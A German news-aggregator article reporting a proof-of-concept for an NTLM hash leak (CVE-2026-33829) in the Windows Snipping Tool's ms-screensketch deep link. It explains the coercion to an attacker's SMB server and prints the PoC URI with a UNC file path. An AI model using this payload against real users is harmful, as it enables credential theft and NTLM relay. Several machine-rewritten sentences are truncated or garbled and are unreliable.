PoC-Exploit für die NTLM-Hash-Leak-Schwachstelle im Windows Snipping Tool veröffentlicht
Ein Proof-of-Concept (PoC) Exploit wurde für eine neu aufgedeckte Schwachstelle Microsofts Snipping Tool veröffentlicht, die Angreifern ermöglicht, die Net-NTLM-Credential-Hashes , ind
Kurzfassung
Warum das wichtig ist
- Ein Proof-of-Concept (PoC) Exploit wurde für eine neu aufgedeckte Schwachstelle Microsofts Snipping Tool veröffentlicht, die Angreifern ermöglicht, die Net-NTLM-Credential-Hashes , ind
- Die als CVE-2026-33829 verfolgte Schwachstelle liegt darin, wie das Windows Snipping Tool Deep-Link-URI-Registrierungen unter Verwendung des ms-screensketch-Protokollschemas verarbeitet.
- Betroffene Versionen der Anwendung registrieren diesen Deep Link, der einen filePath-Parameter akzeptiert.
SvyTech-Check
Redaktionelle Einordnung
Kernpunkt
Ein Proof-of-Concept (PoC) Exploit wurde für eine neu aufgedeckte Schwachstelle Microsofts Snipping Tool veröffentlicht, die Angreifern ermöglicht, die Net-NTLM-Credential-Hashes , ind
Warum relevant
Die Schwachstelle wurde entdeckt und gemeldet, die die Offenlegung mit Microsoft koordinierten, bevor sie öffentlich wurde.
Einordnung
SvyTech ordnet die Meldung aus Cyber Security News als Teil des Themenfelds Technologie ein und verweist auf den Originalartikel, damit Leser Fakten, Quelle und Kontext nachvollziehen koennen.
Aufgrund eines Mangels an ordnungsgemäßer Eingabevalidierung kann ein Angreifer einen UNC-Pfad angeben, der auf einen entfernten, vom Angreifer kontrollierten SMB-Server zeigt, wodurch eine authentifizierte SMB-Verbindung erzwungen und im Zuge dessen der Net-NTLM-Hash des Opfers erfasst wird.
Die Schwachstelle wurde entdeckt und gemeldet, die die Offenlegung mit Microsoft koordinierten, bevor sie öffentlich wurde. Windows Snipping Tool PoC Die Ausnutzung erfordert minimale technische Raffinesse.
Ein Angreifer muss lediglich eine bösartige URL oder eine HTML-Seite hosten, die den Deep Link automatisch auslöst, und das Ziel dazu verleiten, diese zu besuchen.
Der PoC demonstriert den Angriff mit einer einzigen durch den Browser ausgelösten URI: text ms-screensketch:edit?&filePath=\\ \file.png&isTemporary=false&saved=true&source=Toast Wenn ein Opfer diesen Link öffnet, startet das Snipping Tool und versucht im Hintergrund, die entfernte Ressource über SMB zu laden.
Während diesem Verbindungsversuch sendet Windows automatisch die Net-NTLM-Authentifizierungsantwort des Benutzers an den Server des Angreifers, wodurch Anmeldeinformationen offengelegt werden, die anschließend offline geknackt oder bei NTLM-Relay-Angriffen gegen interne Netzwerkressourcen verwendet werden können.
Quelllink
Originalquelle: Cyber Security News
Thema weiterverfolgen
Interne Verlinkung
Im Kontext weiterlesen
Diese weiterfuehrenden Links verbinden das Thema mit relevanten Archivseiten, Schlagwoertern und inhaltlich nahen Artikeln.
Technologie Archiv
Weitere Meldungen aus derselben Hauptkategorie.
Mehr von Cyber Security News
Alle veroeffentlichten Inhalte derselben Quelle im Archiv.
US-Untergrundfirma und Partner setzen skalierbare Reaktortechnologie ein
Redaktionell verwandter Beitrag aus dem selben Themenumfeld.
Blitzschlag über Internetkabel: Gamer-PC und Router zerstört, Wand beschädigt
Redaktionell verwandter Beitrag aus dem selben Themenumfeld.
Quellenprofil
Quelle und redaktionelle Angaben
- Quelle
- Cyber Security News
- Originaltitel
- PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability
- Canonical
- https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/
- Quell-URL
- https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/
Aehnliche Inhalte
Verwandte Themen und interne Verlinkung
Weitere Artikel aus aehnlichen Themenfeldern, damit Leser direkt im selben Kontext weiterlesen koennen.
US-Untergrundfirma und Partner setzen skalierbare Reaktortechnologie ein
Die Unternehmen Deep Fission, ein Technologieunternehmen für die Kernenergie, und Day & Zimmermann (D&Z), ein Ingenieur- und Bauunternehmen, haben eine formale Partnerschaft zur Errichtung einer unterirdischen Kernreakto
06.06.2026
Live Redaktion
Blitzschlag über Internetkabel: Gamer-PC und Router zerstört, Wand beschädigt
Ein Blitzschlag soll laut Berichten eine Internetverbindung in einen zerstörerischen Pfad für Tausende Volt verwandelt haben und dabei einen Router sowie das Mainboard eines PCs beschädigt.
06.06.2026
Live Redaktion
Samsung- und LG-Smart-TVs: Kostenlose Apps verwandeln Ihre Geräte heimlich in KI-Stellvertreter
Laut neuer Forschung Apps auf Samsung-, LG-, Roku- und anderen führenden Smart-TV-Plattformen stillschweigend Millionen äten in ein kommerzielles Wohnheim-Proxy-Net
06.06.2026
Live Redaktion
CISA warnt vor Angriffen durch Ausnutzung der SolarWinds Serv-U-Schwachstelle
Die US-Cybersecurity- und Infrastruktursicherheitsbehörde (CISA) hat eine kritische Schwachstelle SolarWinds Serv-U in ihr Verzeichnis der bekannt ausgenutzten Schwachstellen (KEV) aufgenommen und warnte, dass Bedrohu
06.06.2026
Live Redaktion